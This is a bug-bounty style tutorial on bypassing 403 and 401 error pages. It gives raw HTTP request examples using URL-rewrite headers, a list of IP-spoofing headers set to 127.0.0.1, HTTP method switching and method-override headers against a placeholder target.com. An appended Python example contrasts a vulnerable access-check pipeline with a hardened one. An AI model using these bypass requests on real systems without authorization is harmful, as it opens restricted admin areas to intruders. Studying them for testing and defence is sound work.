Hello Hackers, today in this write-up I am going to give you everything you need to know about bypassing 403 & 401 error pages: some automation tools, tips and tricks, Medium articles, HackerOne disclosed reports, all of it, so let’s get started.
What is the difference between 403 & 401 Errors?
• 401 Unauthorized: This error indicates the need for authentication. It often appears when a user isn’t logged in or lacks permission to access the resource.
• 403 Forbidden: This code shows that while the server understands the request, it refuses to authorize it. Even an authenticated user might encounter this error due to permissions or IP restrictions.
Now I hope you understand the difference between the 403 & 401 error messages :) Let’s dive into some techniques you can use to bypass them:
2) Header Manipulation: In this method you can also use the Param Miner extension in Burp Suite to guess which headers the application accepts in the request. You can use the following test cases:
Like if our GET request looks something like this:
GET /admin HTTP/1.1
Host: target.com
=> 403 Forbidden
Now if the application supports headers like X-Original-URL, X-Rewrite-URL etc., then you can test manually in Burp like this:
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
OR
GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin
There are more headers you can try, for example:
· X-Originating-IP: 127.0.0.1
· X-Forwarded-For: 127.0.0.1
· X-Forwarded: 127.0.0.1
· Forwarded-For: 127.0.0.1
· X-Remote-IP: 127.0.0.1
· X-Remote-Addr: 127.0.0.1
· X-ProxyUser-Ip: 127.0.0.1
· X-Original-URL: /admin
· Client-IP: 127.0.0.1
· True-Client-IP: 127.0.0.1
· Cluster-Client-IP: 127.0.0.1
· Host: localhost
4) HTTP Method Switching: If you cannot access the resource using the GET method, then try changing the method to HEAD, POST, PUT, TRACE, OPTIONS, DELETE or PATCH.
The request looks something like this:
GET /admin HTTP/1.1
Host: target.com
Change the method like this:
POST /admin HTTP/1.1
Host: target.com
If the application supports a method override header, then you can also test like this:
POST /admin HTTP/1.1
Host: target.com
X-http-method-override: GET
Or
X-http-override: GET
Thus you can override the method, and if the WAF is not configured properly you may be able to bypass it.
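The two misconfigurations described above (an access rule that only covers GET, and a back end that honours client-IP, rewrite and method-override headers after the check) beside their fix, as an added example that is not from the original post; the request dicts, the loopback-is-trusted rule and the role field are constructed assumptions.

```python
# Added example, not from the original post.  The write-up's rule
# (GET /admin -> 403 for non-admins) as a weak pipeline beside a hardened
# one.  Requests are constructed dicts: method, path, lowercase headers,
# remote_addr (socket peer) and role.
PROTECTED = ("/admin",)
REWRITE_HEADERS = ("x-original-url", "x-rewrite-url")
METHOD_HEADERS = ("x-http-method-override", "x-http-override")
CLIENT_IP_HEADERS = ("x-forwarded-for", "x-originating-ip", "client-ip",
                     "true-client-ip", "x-remote-ip", "x-remote-addr")
LOOPBACK = "127.0.0.1"

def needs_admin(path):
    return path.startswith(PROTECTED)

def weak_pipeline(req):
    """Rule covers GET only, the client IP is read from any header the
    request carries, and the back end rewrites path and method from
    override headers after the check: checked target != served target."""
    client = req["remote_addr"]
    for h in CLIENT_IP_HEADERS:
        client = req["headers"].get(h, client)
    if (req["method"] == "GET" and needs_admin(req["path"])
            and req["role"] != "admin" and client != LOOPBACK):
        return 403, None, None, req["headers"]
    path, method = req["path"], req["method"]
    for h in REWRITE_HEADERS:
        path = req["headers"].get(h, path)
    for h in METHOD_HEADERS:
        method = req["headers"].get(h, method).upper()
    return 200, method, path, req["headers"]

def hardened_pipeline(req):
    """Override headers are dropped at the edge, the client IP is the
    socket peer, and the rule is applied for every method to the same
    (method, path) the back end will serve."""
    drop = REWRITE_HEADERS + METHOD_HEADERS + CLIENT_IP_HEADERS
    headers = {k: v for k, v in req["headers"].items() if k not in drop}
    if (needs_admin(req["path"]) and req["role"] != "admin"
            and req["remote_addr"] != LOOPBACK):
        return 403, None, None, headers
    return 200, req["method"], req["path"], headers

def make_req(method, path, headers=None, remote_addr="203.0.113.5",
             role="guest"):
    """Build a constructed request; header names are lower-cased."""
    return {"method": method, "path": path, "remote_addr": remote_addr,
            "role": role,
            "headers": {k.lower(): v for k, v in (headers or {}).items()}}
```

Each tuple is (status, served method, served path, headers forwarded to the back end), so the gap between what was checked and what would be served is visible directly.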